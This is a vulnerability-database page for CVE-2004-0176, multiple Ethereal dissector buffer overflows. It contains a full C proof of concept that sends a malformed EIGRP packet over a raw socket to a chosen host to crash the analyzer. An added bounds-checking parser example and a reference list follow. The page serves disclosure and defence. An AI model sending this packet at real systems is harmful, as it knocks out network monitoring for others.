Ethereal Multiple Vulnerabilities

Vulnerability ID: 1107829  Vulnerability type: Buffer overflow
Published: 2004-03-26  Updated: 2005-10-20
CVE ID: CVE-2004-0176
CNNVD-ID: CNNVD-200405-037
Platform: Multiple  CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/170
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200405-037
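|Vulnerability details
Ethereal versions 0.8.13 through 0.10.2 contain multiple buffer overflow vulnerabilities. A remote attacker can cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.
|Vulnerability exploit (EXP)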
/*
 * Ethereal network protocol analyzer
 * EIGRP Dissector TLV_IP_INT Long IP Address Overflow
 * vulnerability
 * proof of concept code
 * version 1.0 (Mar 26 2004)
 *
 * by Rémi Denis-Courmont < ethereal at simphalampin dot com >
 *   www simphalempin com dev 
 *
 * This vulnerability was found by:
 *   Stefan Esser s.esser e-matters de
 * whose original advisory may be fetched from:
 *   security e-matters de advisories 032004.html
 *
 * Vulnerable:
 *  - Ethereal v0.10.2
 *
 * Not vulnerable:
 *  - Ethereal v0.10.3
 *
 * Note: this code will simply trigger a denial of service on Ethereal.
 * It should really be possible to exploit the buffer overflow
 * (apparently up to 29 bytes overflow), but I haven't tried.
 */


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>

static const char packet[] =
        "\x01" /* Version */
        "\x04" /* Opcode: Reply */
        "\x00\x00" /* Checksum (invalid) */
        "\x00\x00\x00\x00" /* Flags */
        "\x00\x00\x00\x00" /* Sequence number */
        "\x00\x00\x00\x00" /* ACK */
        "\x00\x00\x00\x00" /* AS number */

        /* IP internal routes TLV */
        "\x01\x02" /* Type */
        "\x00\x39" /* Length (should be 0x1C) */
        "\x00\x00\x00\x00" /* Next hop */
        "\x00\x00\x00\x00" /* Delay */
        "\x00\x00\x00\x00" /* Bandwidth */
        "\x00\x00\x00" /* MTU */
        "\x00" /* Hop count: directly connected */
        "\xff" /* Reliability: maximum */
        "\x01" /* Load: minimum */
        "\x00\x00" /* Reserved */
        "\xff" /* Prefix length: should be > 0 and <= 32 */
        "\x00\x00\x00" /* Destination network */
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff" /* buffer overflow */
;


static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;

        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }

        len = sizeof (packet) - 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }

        puts ("Packet sent!");
        close (fd);
        return 0;
}


static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
        return 2;
}


int
main (int argc, char *argv[])
{
        struct sockaddr *dest;

        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflow\n"
                "proof of concept code\n"
                "Copyright (C) 2004 Rémi Denis-Courmont "
                "<\x65\x74\x68\x65\x72\x65\x61\x6c\x40\x73\x69\x6d\x70"
                "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");


        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;

                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;

                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %s\n", argv[1],
                                        gai_strerror (check));
                        return 1;
                }

                dest = res->ai_addr;
        }

        return proof ((const struct sockaddr_in *)dest);
}
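
The PoC's comments name the two fields a parser must check before copying the destination bytes: the prefix length ("should be > 0 and <= 32") and the TLV length (0x1C for a three-byte destination, 0x39 in the PoC). The C code below is an added example of that bounds check, not Ethereal's code or the PoC author's; all function and constant names are hypothetical, the field offsets follow the PoC's packet layout, and the sample packets are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define EIGRP_HDR_LEN    20     /* version through AS number, per the PoC layout */
#define TLV_IP_INT       0x0102 /* "IP internal routes" TLV type from the PoC */
#define TLV_IP_INT_FIXED 25     /* TLV header through the prefix-length byte */
enum verdict { TLV_OK, TLV_TRUNCATED, TLV_BAD_PREFIX, TLV_BAD_LENGTH };

/* Validate one IP-internal TLV before any destination bytes are copied. */
static enum verdict check_ip_int(const uint8_t *tlv, size_t tlv_len)
{
    if (tlv_len < TLV_IP_INT_FIXED + 1) return TLV_TRUNCATED;
    unsigned prefix = tlv[TLV_IP_INT_FIXED - 1];
    if (prefix == 0 || prefix > 32) return TLV_BAD_PREFIX; /* bound from the PoC comment */
    /* (prefix + 7) / 8 is 1..4, so the address always fits a 4-byte buffer */
    return tlv_len == TLV_IP_INT_FIXED + (prefix + 7) / 8 ? TLV_OK : TLV_BAD_LENGTH;
}

/* Walk every TLV after the EIGRP header; return the first failure found. */
static enum verdict scan_eigrp(const uint8_t *pkt, size_t len)
{
    if (len < EIGRP_HDR_LEN) return TLV_TRUNCATED;
    for (size_t off = EIGRP_HDR_LEN; off < len; ) {
        if (len - off < 4) return TLV_TRUNCATED;
        unsigned type = (unsigned)pkt[off] << 8 | pkt[off + 1];
        size_t tlv_len = (size_t)pkt[off + 2] << 8 | pkt[off + 3];
        if (tlv_len < 4 || tlv_len > len - off) return TLV_TRUNCATED;
        enum verdict v = type == TLV_IP_INT ? check_ip_int(pkt + off, tlv_len) : TLV_OK;
        if (v != TLV_OK) return v;
        off += tlv_len;
    }
    return TLV_OK;
}

/* Constructed sample: zeroed header plus one TLV with the given length and prefix. */
static size_t build_sample(uint8_t *buf, size_t tlv_len, uint8_t prefix)
{
    uint8_t *tlv = buf + EIGRP_HDR_LEN;
    memset(buf, 0, EIGRP_HDR_LEN + tlv_len);
    tlv[0] = 0x01; tlv[1] = 0x02; tlv[2] = tlv_len >> 8; tlv[3] = tlv_len & 0xff;
    tlv[TLV_IP_INT_FIXED - 1] = prefix;
    return EIGRP_HDR_LEN + tlv_len;
}

int main(void)
{
    uint8_t buf[128];
    printf("length 0x1C, /24:  verdict %d\n", scan_eigrp(buf, build_sample(buf, 0x1C, 24)));
    printf("length 0x39, /255: verdict %d\n", scan_eigrp(buf, build_sample(buf, 0x39, 0xff)));
}
```

The same check works as a pre-filter on captured EIGRP payloads (IP protocol 88) to flag malformed TLVs before they reach an unpatched dissector.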
|References

Source: US-CERT Vulnerability Note: VU#931588
Name: VU#931588
Link: http://www.kb.cert.org/vuls/id/931588
Source: US-CERT Vulnerability Note: VU#864884
Name: VU#864884
Link: http://www.kb.cert.org/vuls/id/864884
Source: US-CERT Vulnerability Note: VU#740188
Name: VU#740188
Link: http://www.kb.cert.org/vuls/id/740188
Source: US-CERT Vulnerability Note: VU#659140
Name: VU#659140
Link: http://www.kb.cert.org/vuls/id/659140
Source: US-CERT Vulnerability Note: VU#644886
Name: VU#644886
Link: http://www.kb.cert.org/vuls/id/644886
Source: US-CERT Vulnerability Note: VU#591820
Name: VU#591820
Link: http://www.kb.cert.org/vuls/id/591820
Source: US-CERT Vulnerability Note: VU#433596
Name: VU#433596
Link: http://www.kb.cert.org/vuls/id/433596
Source: US-CERT Vulnerability Note: VU#125156
Name: VU#125156
Link: http://www.kb.cert.org/vuls/id/125156
Source: US-CERT Vulnerability Note: VU#119876
Name: VU#119876
Link: http://www.kb.cert.org/vuls/id/119876
Source: DEBIAN
Name: DSA-511
Link: http://www.debian.org/security/2004/dsa-511
Source: BUGTRAQ
Name: 20040329 LNSA-#2004-0007: Multiple security problems in Ethereal
Link: http://marc.theaimsgroup.co
